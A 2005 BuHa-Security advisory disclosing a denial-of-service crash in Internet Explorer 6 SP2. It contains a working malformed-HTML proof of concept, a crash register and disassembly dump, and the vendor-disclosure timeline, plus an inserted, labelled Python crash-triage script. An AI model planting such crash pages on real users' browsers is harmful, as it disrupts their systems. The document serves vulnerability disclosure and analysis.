
[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2

Subject: [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2
Date: 24 Dec 2005 23:44:01 -0000

 ---------------------------------------------------
| BuHa Security-Advisory #5     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Read Dereference)      |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6c74b1
===================

The following HTML code forces M$ IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
</samp></colgroup><ul><font><menu> <code> <var>
<sub><h2></fieldset>
</kbd></frameset>
</ins></map></noframes>
</isindex>
</code>
</div></title>
</del></var><isindex>
<i>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000246

        7d6c748b 6a0b             push    0xb
        7d6c748d 33c0             xor     eax,eax
        7d6c748f 59               pop     ecx
        7d6c7490 8bfe             mov     edi,esi
        7d6c7492 f3ab             rep     stosd
        7d6c7494 8b45f8           mov     eax,[ebp-0x8]
        7d6c7497 8906             mov     [esi],eax
        7d6c7499 897228           mov     [edx+0x28],esi
        7d6c749c e9af010000       jmp     mshtml+0x217650 (7d6c7650)
        7d6c74a1 8b4728           mov     eax,[edi+0x28]
        7d6c74a4 8b7028           mov     esi,[eax+0x28]
        7d6c74a7 897728           mov     [edi+0x28],esi
        7d6c74aa 8b4320           mov     eax,[ebx+0x20]
        7d6c74ad 668b4002         mov     ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24           mov     ecx,[esi+0x24]
                                          ds:0023:00000024=????????
        7d6c74b4 66250030         and     ax,0x3000
        7d6c74b8 662d0010         sub     ax,0x1000
        7d6c74bc 66f7d8           neg     ax
        7d6c74bf 897510           mov     [ebp+0x10],esi
        7d6c74c2 1bc0             sbb     eax,eax
        7d6c74c4 40               inc     eax
        7d6c74c5 50               push    eax
        7d6c74c6 e80c8efeff       call    mshtml+0x2002d7 (7d6b02d7)
        7d6c74cb 0fb6c0           movzx   eax,al
        7d6c74ce 48               dec     eax
        7d6c74cf 83f80c           cmp     eax,0xc
        7d6c74d2 0f877b010000     jnbe    mshtml+0x217653 (7d6c7653)
        7d6c74d8 ff2485c7796c7d   jmp     dword ptr [mshtml+0x2179c7
                                          (7d6c79c7)+eax*4]
        7d6c74df 8b4e20           mov     ecx,[esi+0x20]
        7d6c74e2 f6410208         test    byte ptr [ecx+0x2],0x8
        7d6c74e6 7419             jz      mshtml+0x217501 (7d6c7501)
        7d6c74e8 8b45fc           mov     eax,[ebp-0x4]
        7d6c74eb ff7014           push    dword ptr [eax+0x14]
        7d6c74ee 8b4610           mov     eax,[esi+0x10]
        7d6c74f1 03460c           add     eax,[esi+0xc]
        7d6c74f4 50               push    eax
        7d6c74f5 e899ba0100       call    mshtml+0x232f93 (7d6e2f93)

It appears to be a null read dereference crash (esi is zero when [esi+0x24] is read), which is not exploitable.
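As an added crash-triage example (not part of the advisory), the following Python script reproduces that verdict from the register dump and faulting instruction quoted above: it parses the WinDbg-style output, resolves the [esi+0x24] operand against esi=00000000, and checks whether the access lands in the unmapped null page. It only understands simple [base+disp] memory operands, which is all the quoted dump needs.

```python
import re

# Sample input constructed from the register dump and faulting instruction
# quoted in the advisory (WinDbg-style x86 output).
REGISTER_DUMP = """eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8"""
FAULT_INSN = "7d6c74b1 8b4e24           mov     ecx,[esi+0x24]"

# Windows never maps the lowest 64 KiB of user address space, so any access
# landing there faults deterministically instead of touching attacker data.
NULL_PAGE_LIMIT = 0x10000

REG = r"e(?:ax|bx|cx|dx|si|di|sp|bp|ip)"


def parse_registers(dump: str) -> dict:
    """Turn 'eax=0129040a ebx=... ' text into {register_name: int}."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"\b(" + REG + r")=([0-9a-fA-F]{8})", dump)}


def parse_memory_operand(insn: str):
    """Locate the [base+disp] operand of one disassembly line.

    Returns (base_register, displacement, is_write); is_write is True when
    the memory operand is the destination, i.e. it appears before the comma.
    """
    m = re.search(r"\[(" + REG + r")(?:([+-])0x([0-9a-fA-F]+))?\]", insn)
    if not m:
        raise ValueError("no [base+disp] memory operand in: " + insn)
    disp = int(m.group(3), 16) if m.group(3) else 0
    if m.group(2) == "-":
        disp = -disp
    operands = insn.split(None, 3)[3]  # text after address, opcode bytes, mnemonic
    is_write = operands.find("[") < operands.find(",")
    return m.group(1), disp, is_write


def triage(dump: str, insn: str) -> dict:
    """Compute the faulting address and classify the access violation."""
    regs = parse_registers(dump)
    base, disp, is_write = parse_memory_operand(insn)
    addr = (regs[base] + disp) & 0xFFFFFFFF
    if addr < NULL_PAGE_LIMIT:
        kind = "null-page write" if is_write else "null-page read"
        verdict = ("needs further analysis" if is_write
                   else "DoS only: a read from the unmapped null page")
    else:
        kind = "access violation at non-null address"
        verdict = "needs further analysis"
    return {"base": base, "base_value": regs[base], "fault_address": addr,
            "kind": kind, "verdict": verdict}


if __name__ == "__main__":
    print(triage(REGISTER_DUMP, FAULT_INSN))
```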


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
M$ IE 6 SP2 - Win XP Pro SP2
M$ IE 6     - Win 2k SP4


o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@deneke.biz>

--

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory, feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address, therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

